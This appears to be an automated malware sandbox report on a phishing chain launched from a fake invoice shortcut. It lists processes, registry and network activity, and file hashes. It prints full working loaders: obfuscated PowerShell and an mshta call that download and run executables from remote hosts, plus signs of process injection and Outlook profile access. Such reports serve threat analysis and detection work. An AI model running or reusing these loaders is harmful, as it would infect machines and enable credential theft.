| PID 3884 set thread context of 1368 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0092.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=548 -burn.filehandle.self=520
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe
"C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 237.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.226.80.104.in-addr.arpa | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 172.67.214.86:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 86.214.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvk0ynoi.2ml.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 53e7d5ef4d119de244668b9b57da9c51 |
| SHA1 | 6767a782cdec693099aa3edb361b1e34769a3a1e |
| SHA256 | 52fd66cdeb2c1eb206a7cb2f8ab91b9594caa367443d6d457aa665446bb5c760 |
| SHA512 | adc4d65f851338d90908496df691a2f1c77794bf6ac1a04adbf66c9ad481c7671d8f82d04f8d5b0f37b527e547d9e2e786f4738697787d8a3bd49766f3c0fbaf |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{B1C17772-51E1-4EA9-9894-03A754292AA2}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{F7E93DA5-944D-494C-AF51-F1E4CBA3A159}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
C:\Users\Admin\AppData\Local\Temp\5c781e1d
| MD5 | dd0bb39708cd97244d6a552c23625c49 |
| SHA1 | accd09b720f006089a28ff751cc23bdeb2dd195d |
| SHA256 | 7e48e05a11ae7a6ecc779d44be5930cdc62066f83d131990c4276102667967c1 |
| SHA512 | 5ea12d63a8a849ce46b2b86848570bb2f97c7036da327812d9b81d3c61f5da2eed2f851aa5b422852aed9d807ae219b7280bfeab8cff4ca4cc398eecb441c4d0 |
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0094.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files